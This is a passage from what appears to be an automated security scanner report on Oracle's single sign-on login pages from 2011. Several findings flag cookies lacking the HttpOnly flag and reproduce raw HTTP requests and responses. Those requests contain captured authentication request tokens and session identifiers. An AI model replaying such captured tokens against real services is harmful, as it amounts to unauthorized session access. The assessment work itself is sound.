HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:14 GMT Accept-Ranges: bytes Content-Length: 7352 Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBOd6uHK6EVADUS1EHWFB01t_bJ X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ <!-- //global js var var isNav; // on load, run this function doLoad() { MM_reloadPage(true); isNav = (navigator.appName.indexOf("Netscape") !=-1); //register event listeners...[SNIP]...
13.106. https://login.oracle.com/mysso/sso_loginui/t-bg.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/t-bg.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/t-bg.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:16 GMT Accept-Ranges: bytes Content-Length: 271 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBom6uHK6EVADUS1EHWFB01t_cA X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ GIF89a..2..................................................................................................................................................................................................[SNIP]...
13.107. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/t-l-corner.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/t-l-corner.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:18 GMT Accept-Ranges: bytes Content-Length: 1005 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCSO6uHK6EVADUS1EHWFB01t_dD X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/ GIF89a..2..................................................................................................................................................................................................[SNIP]...
13.108. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/t-r-corner.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/t-r-corner.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:19 GMT Accept-Ranges: bytes Content-Length: 1021 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCXC6uHK6EVADUS1EHWFB01t_dP X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/ GIF89a..2..................................................................................................................................................................................................[SNIP]...
13.109. https://login.oracle.com/oam/server/sso/auth_cred_submit
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/oam/server/sso/auth_cred_submit
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:16:28 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /oam/server/sso/auth_cred_submit HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp Content-Length: 2316 Cache-Control: max-age=0 Origin: https://login.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA; OAM_REQ=VERSION_4~J%2bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%2bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%2bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%2flJzu7m9%2f1lXhQDZkvLYt%2bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%2fwXpbFtlj2kGJ%2fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%2f%2fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%2fDEO%2fCYluZce8U%2bGGbT0K9o1sJA4XjxLL8%2f8AfNO%2fwgLKh%2bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%2f1ao%2btvjJSu1MtNbwWjD8UmI6Bp%2bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%2fcJMIXtw%2fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%2b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%2bbfWK8%2f54EneCznHCw32Dn13%2f%2b2dACr4TQeKM9Oua%2f%2bwnu%2bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%2bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%2fPItNWUsY%2bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%2fk2aJmyp8Ow%2fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%2bEXUOC%2f6G2f3htenFJenmnMekNtGu%2fXfaFZL8GjhhVe5W2JhMe%2bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%2fvB%2bACTy9lrXfSV77QwN%2buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%2bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%2fD4y50BLNBJCH%2b8a6B8NLIOqiOoU%2fCEYSRHDnFZv5HTMnTiqJZ%2bljcmdaGu3BPZkHEknjwJ%2frdJN%2fF4KZDIxyB3z0Gc63SxU5%2bTOVa2gKg9LLQNB2%2bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%2fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%2f010hrRBg%2bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%2f5w%3d%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000 v=v1.4&request_id=-1117423317593169810&OAM_REQ=VERSION_4%7EJ%252bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%252bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQ...[SNIP]...
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:16:28 GMT Set-Cookie: OAM_REQ=VERSION_4~8sDFSRHdibovgCmaA9kyeOsOvdSrurh9%2fYsDnUk2jlujlceQtRW%2fQNi%2flXtkj%2f1SgeTckB5GdKb4Hiz%2bcaNwewyERD7QcMRgfrRpVp90TY8%2bnYtDCyQML4cbcIJSBTocN%2bEcyowHjAV4T8IiI3ws7mDtrHQycjFS%2b95QII460g3qoNhW5NtfCCWtvEZPMmVBwHPgvUl5YR43OwJgq%2bgde0LQEam8lbD94jp4S6QIQXKKWPHI0shq11UCzQp5aTviul4GjqyWIuFn07nRX3c7G%2b8HAXNSYggrFqjg7N9UUmqwIfpGSKgxVQm2tlsyhx2lF5%2fX0znmI0CGPxx4YQVTl%2bytRrRVXkWsJKWAVC2FzkHt20rPSUn7Rzo%2bMTr39tUdbEwX6W8hNO2IrkJvXMMcG4bTMjA%2flK%2f4eDDKQ%2br%2f1adGjvQ2WW%2bXBGu1QE7ISAHAcp%2bIbTzC3qDrRlaOZfhk97Y08zoNSgWTBsG12KJsu03sFdYO857KTadQANWaeWqdu2Q2BUUGt%2fbNAg%2fENILYpeVU4d86XheiVhTMYekWWDmFlAWs0DYAM%2fCQK2ZXKVW7YTNKyMvHX1HQ2l4F5f%2bD6JGo%2f4Ry2rQnRq7GyVJ%2bzJQtF6jmJoT%2bzGRiv%2fNNNbbC31fjTRiLatV9yBVhBxppHWhW6bCA6QYsp5V74BcWmdtWQhbfiEnKZ3UmOb%2fCy1sG%2frCk%2fnPRs3cvRcBogNG7wow5PNoRfPVOUWXc7usXNYWVgHDEX%2fHWsui%2f4QTdBvYq%2ft2HetL6iIJD9WZ8jNh%2blmJa3smPgzYT9gacAilyIHHONowOlZ%2bcURiBuvAb7MvZxw9FgzeFFRCTo6x2xnhWElY4HbK7QFkICQ30JqYfGsrCQ8MDGbZGiAbZ46PvOXPiieaTuZc5UIc1bCKdSV1jOhoXiKS%2bwpAoSfC%2fe85ishtCItS6D9QwAU%2b6loe3DgvK4n71PHvaEEvoDHmJRu7cBud9m6v1ZVrhfxyTRXFlYRFNNuqkYAUxr7%2btX%2beHeWSxzLnrsRku1QxjbO9KosKHSaLFViJbMvbUqdCJO47kYlWlO1yUUjPaovy7hybBAbZv2lIBBYVBFi9AkrWVySFrl%2blnuYi%2f7VefR27D8%2fNlHuzS3d0uQp54NDsb3w0CM2d0ZEgF261aZjlrZDv7QPzW5%2fjv47uJUdUyzIIsrD%2fpO4WqefIJZkNbDUIiN4%2fU3MdciWfJk9ZyPeIuj4Z4SIQnGof8Zqf5FpE7YLidXdna2kuPrj9%2bWvOIEl0O6xE87fUHG83cMhqWltQTxdLcr7vm0KmM5n%2bc76Z0YYdmjqH48rlxK5HgZx%2bcLO0qjpOhfgGYsm%2blpKve%2bwUGhiGwuhvSfrI1RCpOeYzZT4Ow%2b7u5rIP2Z9n8CFs7YylZLN1thygm8RmyQw5PuTblocl9AFFvgH3MExec2L3WC0ymRApmsstEbF2Y%2bmnBtTbxMot3ZXMcfN9Aruj3T%2b%2b7D8u2Zv%2ffBdVt5qG3QItonF3FaFRiJ9QfIkvCT2vlYPQbI8jrJ5lqWqqYuyTS6DQdIJsSun1bXFZwksK9WdxHJGkOzAs3tM46h%2bhk9GQBqLceWigyZCuwHPI%2bHUUAq3a3j3jKLvi6eS5ZWrCxGXLqnsFSGQUWP7fElxGN35xwbvqMqetKjqX5VPTvDM4DINi0R1eoL5Xy8JofGj%2f1iEBuChkCDaSwb6sU%2b3ozVy4teWDpKd2ingo72r3r%2fM0rCvbbRfGlsN91sA%3d%3d; path=/; HttpOnly X-ORACLE-DMS-ECID: 0000J8zXg116uHK6EVADUS1EHWFB01taYd X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:16:28 GMT; path=/ Content-Length: 2359 <html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]...
13.110. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/pls/orasso/orasso.wwsso_app_admin.ls_login
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:13 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
